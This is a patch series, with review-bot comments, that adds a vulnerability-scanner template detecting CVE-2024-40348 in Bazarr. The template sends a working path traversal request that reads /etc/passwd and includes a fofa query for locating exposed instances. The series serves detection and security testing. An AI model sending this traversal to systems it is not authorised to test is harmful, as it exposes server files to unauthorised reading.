From 2b4706defeba0e0c1ff9ea782443c028ec91b28e Mon Sep 17 00:00:00 2001
From: Kazgangap
Date: Thu, 18 Jul 2024 21:52:31 +0300
Subject: [PATCH 1/5] bazarr lfi
---
 .../other/bazarr-arbitrary-file-read.yaml | 50 +++++++++++++++++++
 1 file changed, 50 insertions(+)
 create mode 100644 http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml
diff --git a/http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml b/http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml
new file mode 100644
index 0000000000..45b31d282d
--- /dev/null
+++ b/http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml
@@ -0,0 +1,50 @@
+id: bazarr-arbitrary-file-read
+
+info:
+ name: Bazarr < 1.4.3 - Arbitrary File Read
+ author: securityforeveryone
+ severity: high
+ description: |
+ Bazarr 1.4.3 and earlier versions have a arbitrary file read vulnerability.
+ reference:
+ - https://github.com/4rdr/proofs/blob/d70b285245ac6e6efc71aa82c4aac8a4c615c29f/info/Bazaar_1.4.3_File_Traversal_via_Filename.md
+ - https://www.bazarr.media/
+ metadata:
+ vendor: morpheus65535
+ product: bazarr
+ fofa-query: title=="Bazarr" && icon_hash="-1983413099"
+ tags: bazarr,lfi
+flow: http(1) && http(2)
+
+http:
+ - raw:
+ - |
+ GET /login HTTP/1.1
+
+ matchers:
+ - type: word
+ words:
+ - 'Bazarr'
+ internal: true
+
+ - raw:
+ - |
+ GET /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
+ Host: {{Hostname}}
+
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "root:.*:0:0:"
+
+ - type: word
+ part: header
+ words:
+ - "application/octet-stream"
+
+ - type: status
+ status:
+ - 200
From 3c9ba8908bcd433c5829f3b15a6da2c8a917da55 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Sun, 21 Jul 2024 14:21:48 +0530
Subject: [PATCH 2/5] minor-update
---
 http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)
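Review bot: The new `info` block contradicts itself on the affected range: `name: Bazarr < 1.4.3 - Arbitrary File Read` excludes 1.4.3, while `description` says "Bazarr 1.4.3 and earlier versions" and the cited proof is titled for 1.4.3 itself, so someone triaging a hit on exactly 1.4.3 gets two different answers. If 1.4.3 is affected, as the reference title suggests, the name should read `name: Bazarr <= 1.4.3 - Arbitrary File Read`; the description should also say "an arbitrary file read vulnerability" and name the vector (unauthenticated path traversal via `/api/swaggerui/static/`) so a report explains what was actually tested, and state the fixed release if one is known. The first raw request `GET /login HTTP/1.1` carries no `Host:` header, unlike the second one; nuclei presumably fills it from the target, but that is worth confirming rather than assuming, since a missing Host on HTTP/1.1 can be rejected by reverse proxies before Bazarr ever answers.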
diff --git a/http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml b/http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml
index 45b31d282d..c4953b556d 100644
--- a/http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml
+++ b/http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml
@@ -7,13 +7,14 @@ info:
 description: |
 Bazarr 1.4.3 and earlier versions have a arbitrary file read vulnerability.
 reference:
- - https://github.com/4rdr/proofs/blob/d70b285245ac6e6efc71aa82c4aac8a4c615c29f/info/Bazaar_1.4.3_File_Traversal_via_Filename.md
+ - https://github.com/4rdr/proofs/blob/main/info/Bazaar_1.4.3_File_Traversal_via_Filename.md
 - https://www.bazarr.media/
 metadata:
 vendor: morpheus65535
 product: bazarr
 fofa-query: title=="Bazarr" && icon_hash="-1983413099"
 tags: bazarr,lfi
+
 flow: http(1) && http(2)
 
 http:
@@ -23,6 +24,7 @@ http:
 
 matchers:
 - type: word
+ part: body
 words:
 - 'Bazarr'
 internal: true
@@ -32,7 +34,6 @@ http:
 GET /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
 Host: {{Hostname}}
 
-
 matchers-condition: and
 matchers:
 - type: regex
From cd4a8c3479bb7eb9352268cfe022b82c2310276d Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Mon, 22 Jul 2024 15:02:24 +0530
Subject: [PATCH 3/5] Update and rename bazarr-arbitrary-file-read.yaml to CVE-2024-40348.yaml
---
 .../2024/CVE-2024-40348.yaml} | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)
 rename http/{vulnerabilities/other/bazarr-arbitrary-file-read.yaml => cves/2024/CVE-2024-40348.yaml} (88%)
diff --git a/http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml b/http/cves/2024/CVE-2024-40348.yaml
similarity index 88%
rename from http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml
rename to http/cves/2024/CVE-2024-40348.yaml
index c4953b556d..d89e06ac17 100644
--- a/http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml
+++ b/http/cves/2024/CVE-2024-40348.yaml
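Review bot: The reference edit in the first hunk replaces a commit-pinned URL (`.../blob/d70b285245ac6e6efc71aa82c4aac8a4c615c29f/...`) with `.../blob/main/...`, which swaps a stable, content-addressed citation for a moving branch in a third-party repository: the file can be rewritten, renamed or deleted there and the template's only technical reference silently changes or 404s. Unless the pinned link was actually broken, keep the SHA-pinned URL (adding the `main` link alongside it if a "latest" pointer is wanted) so the evidence behind the check stays reproducible. The `part: body` addition and the blank-line cleanup in the other two hunks look fine.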
@@ -1,4 +1,4 @@
-id: bazarr-arbitrary-file-read
+id: CVE-2024-40348
 
 info:
 name: Bazarr < 1.4.3 - Arbitrary File Read
@@ -9,6 +9,10 @@ info:
 reference:
 - https://github.com/4rdr/proofs/blob/main/info/Bazaar_1.4.3_File_Traversal_via_Filename.md
 - https://www.bazarr.media/
+ - https://github.com/bigb0x/CVE-2024-40348
+ classification:
+ epss-score: 0.00043
+ epss-percentile: 0.09329
 metadata:
 vendor: morpheus65535
 product: bazarr
From a2444caa074f96b24e7ce05d0ecade070a7a781f Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Mon, 22 Jul 2024 15:04:07 +0530
Subject: [PATCH 4/5] Update CVE-2024-40348.yaml
---
 http/cves/2024/CVE-2024-40348.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/http/cves/2024/CVE-2024-40348.yaml b/http/cves/2024/CVE-2024-40348.yaml
index d89e06ac17..ab6c6d46c8 100644
--- a/http/cves/2024/CVE-2024-40348.yaml
+++ b/http/cves/2024/CVE-2024-40348.yaml
@@ -17,7 +17,7 @@ info:
 vendor: morpheus65535
 product: bazarr
 fofa-query: title=="Bazarr" && icon_hash="-1983413099"
- tags: bazarr,lfi
+ tags: cve,cve2024,bazarr,lfi
 
 flow: http(1) && http(2)
 
From 9396a830568f049d18895e0bfe797862287e8efd Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 23 Jul 2024 12:50:21 +0530
Subject: [PATCH 5/5] updated matchers
---
 http/cves/2024/CVE-2024-40348.yaml | 18 +++++++++++-------
 1 file changed, 11 insertions(+), 7 deletions(-)
diff --git a/http/cves/2024/CVE-2024-40348.yaml b/http/cves/2024/CVE-2024-40348.yaml
index ab6c6d46c8..9cfe50f590 100644
--- a/http/cves/2024/CVE-2024-40348.yaml
+++ b/http/cves/2024/CVE-2024-40348.yaml
@@ -14,6 +14,8 @@ info:
 epss-score: 0.00043
 epss-percentile: 0.09329
 metadata:
+ verified: true
+ max-request: 2
 vendor: morpheus65535
 product: bazarr
 fofa-query: title=="Bazarr" && icon_hash="-1983413099"
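Review bot: The new `classification` block in the second hunk carries only EPSS fields; now that the template is filed as `CVE-2024-40348`, it should also identify the CVE and the weakness class so tooling that filters or reports on these keys picks it up, i.e. `cve-id: CVE-2024-40348` and `cwe-id: CWE-22` (the `../` request is a plain path traversal), plus `cvss-score`/`cvss-metrics` if the CVE has a published vector, since `severity: high` currently stands unsupported. The only reference added is a third-party exploit repository (`bigb0x/CVE-2024-40348`); the CVE record itself (NVD/MITRE) and, if available, the upstream Bazarr advisory or fix commit are what a reader needs to confirm scope and fixed version, and they belong ahead of PoC code in the list. The `id` rename in the first hunk is fine on its own but leaves `name`/`description` still disagreeing on whether 1.4.3 is affected, which this series never resolves.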
@@ -22,21 +24,23 @@ info:
 flow: http(1) && http(2)
 
 http:
- - raw:
- - |
- GET /login HTTP/1.1
+ - method: GET
+ path:
+ - "{{BaseURL}}/login"
 
 matchers:
 - type: word
 part: body
 words:
 - 'Bazarr'
+ - 'content="Bazarr'
+ - 'window.Bazarr'
+ condition: or
 internal: true
 
- - raw:
- - |
- GET /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
- Host: {{Hostname}}
+ - method: GET
+ path:
+ - "{{BaseURL}}/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd"
 
 matchers-condition: and
 matchers:
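Review bot: In the rewritten fingerprint matcher the bare word `'Bazarr'` makes the two new entries redundant: under `condition: or`, any body containing `content="Bazarr` or `window.Bazarr` already contains `Bazarr`, so the added words never change the outcome and the gate that decides whether the traversal request is sent remains the loosest of the three. If the intent was a tighter fingerprint (the bare word also matches dashboards or proxy index pages that merely link to a Bazarr instance), drop `'Bazarr'` and keep the two specific words; if the bare word is the intended gate, the extra entries and `condition: or` are dead weight and should go. Moving the traversal from a raw request into `path:` means the URL is now assembled and sent by nuclei's HTTP client rather than as literal bytes, so the `../` segments reaching the server unnormalized is now a property of the client rather than of the template; `verified: true` suggests this was observed, but if it was not checked explicitly, a raw request with `unsafe: true` is the form that guarantees it. The second request's `matchers:` list continues past the end of this hunk.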